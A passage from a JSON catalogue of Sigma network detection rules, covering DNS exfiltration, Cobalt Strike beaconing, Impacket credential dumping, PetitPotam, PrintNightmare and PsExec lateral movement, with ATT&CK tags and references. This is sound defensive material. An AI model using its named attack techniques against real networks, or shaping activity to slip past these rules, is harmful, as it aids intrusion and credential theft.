Possible result of iodine tool execution", - "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", - "value": "High NULL Records Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_null_records_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS requests amount from host per short period of time", - "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", - "value": "High DNS Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. 
Possible result of Do-exfiltration tool execution", - "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", - "value": "High TXT Records Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_txt_records_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", - "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", - "value": "Cobalt Strike DNS Beaconing", - "meta": { - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/05/10", - "filename": "net_dns_mal_cobaltstrike.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to Monero mining pools", - "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", - "value": "Monero Crypto Coin Mining Pool Lookup", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496", - 
"attack.t1567" - ], - "creation_date": "2021/10/24", - "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate crypto coin mining" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries using base64 encoding", - "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", - "value": "Suspicious DNS Query with B64 Encoded String", - "meta": { - "refs": [ - "https://github.com/krmaxwell/dns-exfiltration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/05/10", - "filename": "net_dns_susp_b64_queries.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", - "uuid": "c64c5175-5189-431b-a55e-6d9882158251", - "value": "Telegram Bot API Request", - "meta": { - "refs": [ - "https://core.telegram.org/bots/faq", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102.002" - ], - "creation_date": "2018/06/05", - "filename": "net_dns_susp_telegram_api.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate 
use of Telegram bots in the company" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects strings used in command execution in DNS TXT Answer", - "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", - "value": "DNS TXT Answer with Possible Execution Strings", - "meta": { - "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/08/08", - "filename": "net_dns_susp_txt_exec_strings.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects wannacry killswitch domain dns queries", - "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", - "value": "Wannacry Killswitch Domain", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2020/09/16", - "filename": "net_dns_wannacry_killswitch_domain.yml", - "author": "Mike Wade", - "level": "high", - "falsepositive": [ - "Analyst testing" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", - "uuid": "881834a4-6659-4773-821e-1c151789d873", - "value": "Equation Group C2 Communication", - "meta": { - "refs": [ - 
"https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.g0020", - "attack.t1041" - ], - "creation_date": "2017/04/15", - "filename": "net_firewall_apt_equationgroup_c2.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "uuid": "3b6e327d-8649-4102-993f-d25786481589", - "value": "High DNS Bytes Out - Firewall", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/10/24", - "filename": "net_firewall_high_dns_bytes_out.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS requests amount from host per short period of time", - "uuid": "51186749-7415-46be-90e5-6914865c825a", - "value": "High DNS Requests Rate - Firewall", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_firewall_high_dns_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - 
"Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Detects many failed connection attempts to different ports or hosts", - "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", - "value": "Network Scans Count By Destination IP", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2017/02/19", - "filename": "net_firewall_susp_network_scan_by_ip.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Detects many failed connection attempts to different ports or hosts", - "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", - "value": "Network Scans Count By Destination Port", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2017/02/19", - "filename": "net_firewall_susp_network_scan_by_port.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. 
Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", - "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", - "value": "Domain User Enumeration Network Recon 01", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1082" - ], - "creation_date": "2020/05/03", - "filename": "zeek_dce_rpc_domain_user_enumeration.yml", - "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", - "level": "medium", - "falsepositive": [ - "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", - "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", - "value": "MITRE BZAR Indicators for Execution", - "meta": { - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053.002", - "attack.t1569.002" - ], - "creation_date": "2020/03/19", - "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", - "author": "@neu5ron, SOC Prime", - "level": "medium", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", - "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", - "value": "MITRE BZAR Indicators for Persistence", - "meta": { - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2020/03/19", - "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", - "author": "@neu5ron, SOC Prime", - "level": "medium", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). 
Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", - "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", - "value": "Potential PetitPotam Attack Via EFS RPC Calls", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" - ], - "tags": [ - "attack.t1557.001", - "attack.t1187" - ], - "creation_date": "2021/08/17", - "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", - "author": "@neu5ron, @Antonlovesdnb, Mike Remen", - "level": "medium", - "falsepositive": [ - "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." 
- ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", - "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", - "value": "Possible PrintNightmare Print Driver Install", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/corelight/CVE-2021-1675", - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.1678", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/08/23", - "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", - "author": "@neu5ron (Nate Guagenti)", - "level": "medium", - "falsepositive": [ - "Legitimate remote alteration of a printer driver." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", - "value": "SMB Spoolss Name Piped Usage", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2018/11/28", - "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", - "author": "OTR (Open Threat Research), @neu5ron", - "level": "medium", - "falsepositive": [ - "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", - "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", - "value": "Default Cobalt Strike Certificate", - "meta": { - "refs": [ - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.s0154" - ], - "creation_date": "2021/06/23", - "filename": "zeek_default_cobalt_strike_certificate.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", - "uuid": 
"bf74135c-18e8-4a72-a926-0e4f47888c19", - "value": "DNS Events Related To Mining Pools", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" - ], - "tags": [ - "attack.t1569.002", - "attack.t1496" - ], - "creation_date": "2021/08/19", - "filename": "zeek_dns_mining_pools.yml", - "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", - "level": "low", - "falsepositive": [ - "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for a DNS request to the ma>", - "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", - "value": "New Kind of Network (NKN) Detection", - "meta": { - "refs": [ - "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://github.com/Maka8ka/NGLite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/04/21", - "filename": "zeek_dns_nkn.yml", - "author": "Michael Portera (@mportatoes)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", - "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", - "value": "Suspicious DNS Z Flag Bit Set", - "meta": { - "refs": [ - "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", - "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" - 
], - "tags": [ - "attack.t1095", - "attack.t1571", - "attack.command_and_control" - ], - "creation_date": "2021/05/04", - "filename": "zeek_dns_susp_zbit_flag.yml", - "author": "@neu5ron, SOC Prime Team, Corelight", - "level": "medium", - "falsepositive": [ - "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", - "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", - "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", - "value": "DNS TOR Proxies", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" - ], - "tags": [ - "attack.t1048" - ], - "creation_date": "2021/08/15", - "filename": "zeek_dns_torproxy.yml", - "author": "Saw Winn Naung , Azure-Sentinel", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", - "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", - "value": "Executable from Webdav", - "meta": { - "refs": [ - "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/05/01", - "filename": "zeek_http_executable_download_from_webdav.yml", - "author": "SOC Prime, Adam Swan", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. 
Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", - "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", - "value": "OMIGOD HTTP No Authentication RCE", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://twitter.com/neu5ron/status/1438987292971053057?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.lateral_movement", - "attack.t1068", - "attack.t1190", - "attack.t1203", - "attack.t1021.006", - "attack.t1210" - ], - "creation_date": "2021/09/20", - "filename": "zeek_http_omigod_no_auth_rce.yml", - "author": "Nate Guagenti (neu5ron)", - "level": "high", - "falsepositive": [ - "Exploits that were attempted but unsuccessful.", - "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. 
This could be an indicator of exfiltration.", - "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", - "value": "WebDav Put Request", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2020/05/02", - "filename": "zeek_http_webdav_put_request.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", - "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", - "value": "Publicly Accessible RDP Service", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1021/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" - ], - "tags": [ - "attack.t1021.001" - ], - "creation_date": "2020/08/22", - "filename": "zeek_rdp_public_listener.yml", - "author": "Josh Brower @DefensiveDepth", - "level": "high", - "falsepositive": [ - "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." 
- ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", - "value": "Remote Task Creation via ATSVC Named Pipe - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ], - "creation_date": "2020/04/03", - "filename": "zeek_smb_converted_win_atsvc_task.yml", - "author": "Samir Bousseaden, @neu5rn", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL. 
Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", - "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", - "value": "Possible Impacket SecretDump Remote Activity - Zeek", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ], - "creation_date": "2020/03/19", - "filename": "zeek_smb_converted_win_impacket_secretdump.yml", - "author": "Samir Bousseaden, @neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", - "value": "First Time Seen Remote Named Pipe - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_lm_namedpipe.yml", - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "level": "high", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different 
psexec client other than sysinternal one", - "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", - "value": "Suspicious PsExec Execution - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_susp_psexec.yml", - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects known sensitive file extensions via Zeek", - "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", - "value": "Suspicious Access to Sensitive File Extensions - Zeek", - "meta": { - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", - "author": "Samir Bousseaden, @neu5ron", - "level": "medium", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", - "value": "Transferring Files with Credential Data via Network Shares - Zeek", - "meta": { - 
